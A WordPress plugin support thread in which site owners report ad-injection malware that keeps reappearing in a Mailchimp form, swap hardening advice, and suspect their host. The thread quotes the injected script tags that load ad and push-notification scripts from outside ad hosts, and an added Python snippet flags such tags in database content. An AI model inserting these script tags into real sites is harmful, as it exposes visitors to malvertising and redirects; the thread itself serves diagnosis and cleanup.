Support » Plugin: Anti-Malware Security and Brute-Force Firewall » MW:JS:GEN2?rogueads.unwanted_ads.1

  • Resolved sussexlongman

    (@sussexlongman)


    Hi, I’m having a problem with some malware that is being repeatedly added in front of a Mailchimp form. The script is creating links to external websites upon clicking on navigation links. A sucuri scan picks up the malware but your scanner does not at the moment. This is the Sucuri report:

    Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?rogueads.unwanted_ads.1
    
    </script><!-- MailChimp for WordPress v4.0.13 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-534" method="post" data-id="534" data-name="" ><div class="mc4wp-form-fields"><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>

    I have removed the inserted code from the Mailchimp form several times which cleans the site but the code returns within a day or two so I presume there is malicious code elsewhere on the site doing this. Any help would be very much appreciated, thanks.

Viewing 15 replies - 1 through 15 (of 30 total)
  • Plugin Author Eli

    (@scheeeli)

    That is an old threat that is already in my definition updates. My plugin should be able to remove it along with any other threats that might be sustaining it. Can you show me a screenshot of what my plugin finds?

    If you want to contact me directly I can help more.

    Thanks for getting back. You can see a screenshot of what the plugin finds when this threat is active on the site at:

    https://www.dropbox.com/s/idtju1fhkb5ekwp/Anti-Malware%20Scan.png?dl=0

    How do I contact you directly?

    Plugin Author Eli

    (@scheeeli)

    I see that the threat is not there currently. Maybe it’s being planted on your site from another infected site on the same server.

    You can contact me directly here:
    eli AT gotmls DOT net

    Hi again, I contacted the web host and they said:

    Sucuri could detect javascript code injected in the database. Most of the other scanning software checks just the files.

    Our Cloud websites are isolated from each other so it looks like the issue is the hacker still has access to your website. There could be other compromised files or they might have guessed your passwords.

    Any thoughts?
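The host's point above is that the injected tags live in database content (here the stored mc4wp form markup), so a file-only scan misses them. The following is an added example, not code from the plugin or from anyone in this thread: it pulls the host out of every external `<script src=...>` in stored markup, including the protocol-relative `//host/...` form the injected tags use, and flags hosts outside an allow-list. The allow-list and the row shape `(table, id, text)` are assumptions; the sample rows are constructed from the tags quoted in the Sucuri report.

```python
import re
from urllib.parse import urlsplit

# Hosts this site is expected to load scripts from (assumed for the example).
ALLOWED_HOSTS = {"example.com", "www.example.com", "wordpress.org"}

# Match <script ... src='...'> / src="..." and capture the quoted URL.
SCRIPT_SRC_RE = re.compile(
    r"""<script\b[^>]*?\ssrc\s*=\s*(["'])(.*?)\1""", re.IGNORECASE | re.DOTALL
)


def script_hosts(html):
    """Return the host of every <script src=...> found in an HTML fragment."""
    hosts = []
    for _, src in SCRIPT_SRC_RE.findall(html):
        src = src.strip()
        if src.startswith("//"):  # protocol-relative URL, as in the injected tags
            src = "https:" + src
        host = urlsplit(src).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def flag_rows(rows, allowed_hosts=ALLOWED_HOSTS):
    """rows: iterable of (table, primary_key, text), e.g. dumped from wp_posts
    and wp_options. Returns one finding per row that pulls scripts from a host
    outside the allow-list, with the offending hosts sorted."""
    findings = []
    for table, pk, text in rows:
        bad = sorted({h for h in script_hosts(text) if h not in allowed_hosts})
        if bad:
            findings.append({"table": table, "id": pk, "hosts": bad})
    return findings


# Constructed sample: a row resembling the stored mc4wp form with the tags from
# the Sucuri report above, and a clean row that only loads a first-party script.
SAMPLE_ROWS = [
    ("wp_posts", 534,
     "<div class=\"mc4wp-form-fields\">"
     "<script data-cfasync='false' type='text/javascript' "
     "src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>"
     "<script type=\"text/javascript\" src=\"//go.pub2srv.com/apu.php?zoneid=683723\"></script>"
     "<script async=\"async\" type=\"text/javascript\" "
     "src=\"//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1\"></script>"
     "<p><label>Email <input type=\"email\" name=\"EMAIL\"></label></p></div>"),
    ("wp_options", 1, "<script src=\"https://example.com/js/app.js\"></script>"),
]

if __name__ == "__main__":
    for f in flag_rows(SAMPLE_ROWS):
        print(f"{f['table']}#{f['id']}: external script hosts {f['hosts']}")
```

Against a live site, feed it the `post_content` and `option_value` columns and review every flagged host; a row that keeps coming back after cleaning points to whatever still has write access to the database.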

    Plugin Author Eli

    (@scheeeli)

    Have you done the usual password hardening: change the DB_PASSWORD for your MySQL database and update wp-config.php; check for and delete any rogue administrator users; change passwords for all users with elevated permissions; and scan all your local PCs for viruses and spyware that might be stealing your passwords.

    I am having this exact same problem. All plugins updated, files scanned for malware, but the hack appears again hours later.

    Just away to change the db user details in hope that it works.

    @sussexlongman & @natepayne Can you please let me know which hosting provider you are using? Because I’m having the same issue 🙁

    https://www.tsohost.com/ is who I am with for this site. It’s the only site affected and the only one hosted with TSO.

    I changed mysql username and password, updated all auth keys for wordpress and changed passwords for wordpress users.

    Also scanned all files for malware and nothing was reported.

    Since all of that the site has had this hack happen again – although this time the JS now redirects the website to another spam advert site.

    Also scanned the computers here in the office and all are clear of malware and viruses.


    @natepayne I’m damn sure this problem is with TSO Host. My two websites were also hacked. I think there is something. I’m moving today to my own dedicated server.

    Is your database server 168.169.0.136?

    I am on 168.169.0.133…

    Damn, I am away to give them a call…

    My site is with Tsohost too, though I have others with them too that are unaffected. A few days ago, this was their response:

    ‘Our Cloud websites are isolated from each other so it looks like the issue is the hacker still has access to your website. There could be other compromised files or they might have guessed your passwords.’

    I’ve deleted the Mailchimp plugin on my site and will embed a form using Mailchimp’s own sign-up form code. I’ve had no repeat problems since but am still concerned that the malicious code may still be around.

    Let me know if you get anywhere with Tsohost.

    Hello @sussexlongman,

    I’ve moved my site to https://www.nawabhost.com, and since last night I feel safe; there is no malware on my sites.

    I’ve contacted TSO and they replied to me about the WordPress 4.7.1 REST API bug, but all our sites are running 4.7.2, so there is no chance of getting hacked that way.

    We have the same problem, but I don’t know why TSO Host is ignoring this 🙁

    I have also contacted TSO and they have said this is “certainly not a server side vulnerability”.

    They were unable to find malware which to me means the issue has to be due to the server?

    The malware can’t be found in a regular scan, I think. It’s a normal JavaScript file that loads ads from outside. TSO Host tells me to hire Sucuri or somebody who can clean my malware. If the server has security shortcomings, then how do I clean my site? My site is affected again once the site is cleaned.
